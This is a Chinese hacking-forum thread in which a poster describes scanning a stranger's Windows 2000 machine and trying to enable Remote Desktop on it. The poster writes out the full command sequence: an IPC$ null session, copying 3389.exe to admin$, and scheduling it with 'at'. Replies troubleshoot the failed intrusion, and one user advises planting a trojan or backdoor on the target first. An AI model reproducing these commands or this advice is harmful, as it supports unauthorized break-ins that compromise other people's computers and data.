|
 | 作者: xuebaby [xuebaby]
 论坛用户 |
登录 |
| 本帖由 [TomyChen] 从 << 黑客进阶>> 转移而来我用X-scan扫描到一台机子,win2000操作系统 开了139端口,IPC$也开了 net use \\127.0.0.1\ipc$ "" /user:"" 命令成功 copy 3389.exe \\127.0.0.1\admin$ 已复制1个文件 net time \\127.0.0.1 127.0.0.1当前时间是 00:00 at \\127.0.0.1 00:05 3389.exe 新加了一项作业,作业ID 1 看起来一切都很成功的样子,3389.exe在本机上我自己试过了,确实可以开启远程终端服务。 可是到了作业时间,对方机子根本就没有被重启,我等了一会之后,3389端口也没开,还是连不上他的机子。 希望有哪位高手,手把手的教教小弟,先在此谢过了 |
| 地主 发表时间: 10/04 08:07 |
 | 回复: bei [bei]  论坛用户 |
登录 |
|
对方是win2000的服务器马?是不是安装了3389服务? |
| B1层 发表时间: 10/04 10:30 |
| 回复: xuebaby [xuebaby] 论坛用户 |
登录 |
|
我觉得 你不应该回答我的问题 首先,对方当然是win2000系统,因为我都映射过他的C$ 看的清清楚楚 另外,我的目的是开他的3389 所以他的3389当然没开了 |
| B2层 发表时间: 10/04 14:51 |
 | 回复: gebishamo [gebishamo]  论坛用户 |
登录 |
|
那就不知道了 |
| B3层 发表时间: 10/04 14:56 |
| 回复: xuebaby [xuebaby] 论坛用户 |
登录 |
|
呵,没事了 就当白问吧 我找别的机子去,只不过是想尽量可以连上他的机子而已 既然连不上,等以后多学点再连吧 |
| B4层 发表时间: 10/04 15:26 |
 | 回复: Greentea [napolun]  版主 |
登录 |
|
1.对方不能是win2000 pro版,它没有终端服务,不能开3389。 2.对方没有开计划任务,at命令失效。 |
| B5层 发表时间: 10/07 21:52 |
 | 回复: hebin [hebin] 论坛用户 |
登录 |
|
我都还碰到AT命令无效的, at IP 时间 文件 拒绝访问 |
| B6层 发表时间: 10/10 06:28 |
 | 回复: ilxc [ilxc] 论坛用户 |
登录 |
|
同意Greentea 的说法 |
| B7层 发表时间: 10/10 10:20 |
 | 回复: cyshaoping [cyshaoping] 论坛用户 |
登录 |
|
贺乐天:那是对方没开启计划任务 |
| B8层 发表时间: 10/12 21:43 |
 | 回复: hackerkill [hackerkill] 论坛用户 |
登录 |
|
但是他的AT命令没有出现无效的啊 |
| B9层 发表时间: 10/12 23:56 |
| 回复: hebin [hebin] 论坛用户 |
登录 |
|
谢谢,我已经知道了,不过在这里我还是要谢谢你告诉我对方机子没开启执行命令! 回复: cyshaoping [cyshaoping] 论坛用户 回复 发送 贺乐天:那是对方没开启计划任务 :) |
| B10层 发表时间: 10/13 13:18 |
 | 回复: yutou [yutou] |
登录 |
|
靠,楼主这种水平居然能混两个金星,我看我还是很有前途的嘛 |
| B11层 发表时间: 12/12 09:11 |
 | 回复: naforce [naforce] 论坛用户 |
登录 |
|
对方可能是专业版的吧,专业版没有终端服务 |
| B12层 发表时间: 12/12 12:23 |
 | 回复: zcl [zcl]  论坛用户 |
登录 |
|
也有可能你刚COPY过去就被KILL了也难说! |
| B13层 发表时间: 12/12 13:37 |
| 回复: lho [lho] 论坛用户 |
登录 |
|
对,我也有过,刚刚拷上就被KILL了,很简单的杀毒软件就可以杀掉类似的软件 |
| B14层 发表时间: 12/14 15:38 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
对! 个人版本是不允许安装终端的!被杀毒软件上杀也很正常,我也经常碰到这样的问题! 楼主我建议你给对方开放TELNET 然后把文件拷贝过去! 看看文件在不在! 如果在运行一下看看,有的时候在个别的机器上运行OPEN3389会出现错误的! 在说你不一定一次就给对方开放3389 可以给对方安装一个木马或者后门之类的东西让对方运行了然后在开3389 我想这样更保险一点! 还有一种可能是对方的机器不是固定IP 计算机从新启动就换了IP ! 这些都是给对方开.3389经常碰到的问题! |
| B15层 发表时间: 12/14 16:15 |
 | 回复: fjs [fjs] 论坛用户 |
登录 |
|
管理员禁用远程登陆也有可能了 |
| B16层 发表时间: 12/14 16:23 |
| 回复: xuebaby [xuebaby] 论坛用户 |
登录 |
|
晕倒哦 几百年前的贴子都被挖出来了 你们厉害 |
| B17层 发表时间: 12/17 10:37 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 已经administrator口令,open3389无效